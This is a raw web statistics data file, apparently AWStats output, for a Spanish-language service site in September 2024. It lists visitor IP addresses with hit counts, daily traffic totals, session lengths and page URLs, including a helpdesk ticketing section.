144.126.131.216 4 4 10996 20240916005340
191.156.144.230 0 2 261107 
204.236.208.246 1 1 4264 20240923030528
66.249.83.137 1 4 7220 20240929055807
138.199.59.202 2 2 5498 20240916174604
106.75.175.130 1 5 114757 20240925224048
23.80.151.190 2 2 5498 20240919183309
23.21.179.110 2 17 6852709 20240904084443
190.250.9.76 5 19 2298365 20240925093755
157.100.134.230 0 1 491746 
81.42.210.31 2 16 2286184 20240911001542
52.81.187.72 3 18 2309613 20240913100249
216.73.161.203 1 1 2749 20240927001818
44.220.188.241 1 1 809 20240928000252
91.92.252.122 3 3 51114 20240924011452
45.156.129.58 1 1 809 20240917154006
107.175.26.220 1 1 2749 20240924054013
37.187.215.245 2 2 3474 20240918150231
147.45.77.225 2 2 1618 20240926105553
172.96.95.184 2 2 5498 20240919221433
186.30.129.191 1 15 2281920 20240926175708
146.70.15.30 2 2 5498 20240904223455
185.180.140.110 1 1 809 20240927012736
5.254.23.72 2 2 5498 20240902120109
186.31.138.105 1 15 2281920 20240930120533
192.99.148.106 2 2 28912 20240920212729
124.236.100.56 1 1 4264 20240910183144
134.209.98.20 1 1 17038 20240914145014
2.56.34.132 1 1 2749 20240913234054
2.56.35.162 1 1 2749 20240910011216
178.63.180.104 2 2 23748 20240929063647
43.131.44.218 1 1 4264 20240905220130
34.229.219.101 3 3 51114 20240903141517
186.30.26.22 1 15 2281920 20240924191657
64.225.5.193 1 1 4264 20240915063609
181.48.255.69 1 15 2281920 20240904073244
104.168.234.52 2 2 5498 20240901172457
45.58.177.223 1 1 809 20240927165958
196.196.23.160 2 2 5498 20240925204210
138.68.24.56 1 1 809 20240912174702
93.158.90.69 1 1 4264 20240913095928
192.3.144.30 2 2 5498 20240930095427
62.141.44.236 1 1 4264 20240910025728
125.72.106.171 1 1 4264 20240910000923
40.94.227.13 1 5 245013 20240921085218
181.204.233.138 1 15 2281920 20240927094144
191.102.90.98 3 18 6855771 20240923113221
181.78.71.171 5 62 19792459 20240929064836
49.51.36.179 1 1 4264 20240927041856
191.156.153.182 0 1 255566 
23.80.151.227 2 2 5498 20240910213000
200.122.252.3 1 15 2281920 20240905120241
191.156.51.228 1 3 267604 20240930073034
172.241.153.32 2 2 5498 20240916042817
209.38.104.159 1 1 4264 20240927052052
64.23.243.0 1 1 809 20240925191053
51.159.101.211 1 1 809 20240908053815
191.156.232.169 5 20 6864299 20240907084700
172.241.169.204 2 2 5498 20240918183711
186.87.164.81 1 15 2281920 20240924143319
45.156.128.48 1 1 809 20240919223413
87.236.176.21 1 1 809 20240902072645
43.163.0.99 1 1 4264 20240914015134
196.243.240.98 2 2 5498 20240911060028
104.168.175.131 2 2 5498 20240917152450
104.198.215.1 1 1 4264 20240906215419
191.156.145.151 1 1 4264 20240918194919
205.169.39.20 2 2 8528 20240930132700
207.244.118.163 3 3 9414 20240910135026
199.244.88.231 1 1 4264 20240925184137
49.51.47.100 2 3 194427 20240927084924
134.209.41.90 1 1 4264 20240929052611
4.213.167.133 3 3 51114 20240929144147
167.172.253.37 1 1 4264 20240925185828
69.58.12.191 1 1 3072 20240914235233
104.168.136.116 2 2 5498 20240928092509
152.201.195.51 1 15 2281920 20240907083258
104.168.138.203 2 2 5498 20240908100843
119.96.24.54 1 1 4264 20240919152021
168.151.226.252 1 1 2749 20240924054025
128.14.173.99 1 1 809 20240912035214
54.88.179.33 1 1 17038 20240919155812
45.156.130.2 1 1 809 20240905220523
186.116.216.77 1 15 2281920 20240901073540
154.202.124.214 1 1 2749 20240928203700
191.156.153.235 0 2 343824 
181.188.178.141 4 21 6540631 20240915092643
149.71.176.5 4 4 12158 20240917062654
206.189.96.59 1 1 809 20240915190510
172.70.254.239 1 1 4264 20240925092817
85.203.45.188 1 1 2749 20240910042751
191.201.139.251 1 10 343607 20240902083053
181.188.170.230 1 15 2281920 20240911175156
104.168.211.70 2 2 5498 20240903212057
179.6.80.49 1 15 2281920 20240916111633
45.15.157.177 1 1 2749 20240929003028
43.130.39.101 1 1 3072 20240927095702
122.162.146.156 2 2 5498 20240916160503
64.137.60.220 1 1 3072 20240914235432
104.168.25.63 2 2 6144 20240904175851
191.156.145.123 0 2 274731 
193.176.211.191 1 1 2749 20240924192541
205.185.125.57 1 1 809 20240914173214
103.170.66.47 2 2 5498 20240919004137
185.251.19.123 1 1 2749 20240925162306
43.130.12.8 2 2 8528 20240911224852
172.241.146.122 2 2 5498 20240905125058
49.51.183.220 3 3 12792 20240921231326
93.158.91.250 1 1 4264 20240927155840
172.225.250.116 1 15 2281920 20240905173745
38.153.195.167 2 2 5498 20240905081022
191.156.59.175 0 3 362569 
45.61.48.223 1 1 17038 20240914155052
192.36.198.80 1 1 4264 20240901200930
149.71.178.115 4 4 12158 20240911170445
170.106.82.193 1 1 4264 20240905070835
132.148.135.82 1 1 0 20240902161644
180.102.134.69 1 1 4264 20240928074559
64.226.85.149 1 1 4264 20240909053601
186.22.56.18 1 15 2281920 20240924071723
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20240901 12 26 2310356 10
20240902 94 258 33466626 27
20240903 58 143 20439458 22
20240904 72 171 20781746 33
20240905 54 113 13669398 24
20240906 30 44 2487160 19
20240907 46 75 9317576 20
20240908 54 54 488848 22
20240909 38 65 449170 21
20240910 59 84 2490897 27
20240911 41 99 13528093 23
20240912 65 107 4902060 22
20240913 28 66 9378234 20
20240914 30 30 136125 23
20240915 23 38 2377821 16
20240916 47 94 8124455 26
20240917 85 143 15942193 27
20240918 63 158 9675751 30
20240919 64 93 5040450 33
20240920 38 71 4943448 24
20240921 53 131 2942313 20
20240922 24 38 2361956 16
20240923 35 79 12024372 23
20240924 35 77 7005670 19
20240925 52 110 14124159 38
20240926 94 118 9123259 24
20240927 40 122 31891295 27
20240928 27 55 4642157 22
20240929 50 98 13985469 31
20240930 41 130 34743483 24
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
0s-30s 648
1h+ 1
2mn-5mn 14
30mn-1h 3
5mn-15mn 12
15mn-30mn 18
30s-2mn 17
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 35
/contactenos.php 434 1808882 189 236
/ 368 2331396 330 263
/suspencion.php 256 228286 129 129
/pqr/upload/scp/tickets.php 89 507387 6 5
/pqr/upload/scp/autocron.php 57 2394 0 6
/pqr/upload/scp/logo.php 41 153832 27 19
/index.php 34 310690 12 20
/residenciales.php 29 126511 3 4
/pqr/upload/scp/ajax.php/users/lookup/form 18 35263 0 1
/pqr/upload/scp/index.php 15 56330 3 0
/medidor.php 14 62873 9 9
/caracteristicas.php 13 156954 1 5
/pqr/upload/scp/ajax.php/users/local 11 420 0 0
/pqr/upload/scp/ajax.php/form/help-topic/12 11 63770 0 0
/factores.php 9 57993 1 4
/pqr/upload/scp/ajax.php/content/signature/none 9 0 0 0
/pqr/upload/ 7 21368 2 2
/pqr/upload/scp/ajax.php/list/3/items/33/preview 5 675 0 1
/corporativo.php 5 45599 0 1
/pqr/upload/scp/ajax.php/draft/ticket.staff 4 144 0 0
/control.php 3 34551 0 1
/pqr/upload/scp/ajax.php/list/3/items/27/preview 3 369 0 0
/pqr/upload/assets/font/fontawesome-webfont.woff 3 130716 0 3
/informacion_crc.php 2 4710 1 2
/procedimientos.php 2 36398 0 0
/pqr/upload/ajax.php/i18n/es_MX/js 1 2799 0 0
/pqr/upload/scp/ajax.php/users/select/819 1 2396 0 0
/pqr/upload/scp/ajax.php/tickets/1121/preview 1 747 0 0
/pqr/upload/scp/ajax.php/draft/ticket.staff.response 1 36 0 0
/pqr/upload/scp/ajax.php/help/tips/tickets.queue 1 1465 0 0
/pqr/upload/scp/ajax.php/list/3/items/44/preview 1 130 0 0
/pqr/upload/scp/ajax.php/form/help-topic/14 1 5788 0 0
/pqr/upload/logo.php 1 19229 0 1
/pqr/upload/open.php 1 2913 0 1
/pqr/upload/scp/ajax.php/users/select/792 1 2410 0 0
END_SIDER
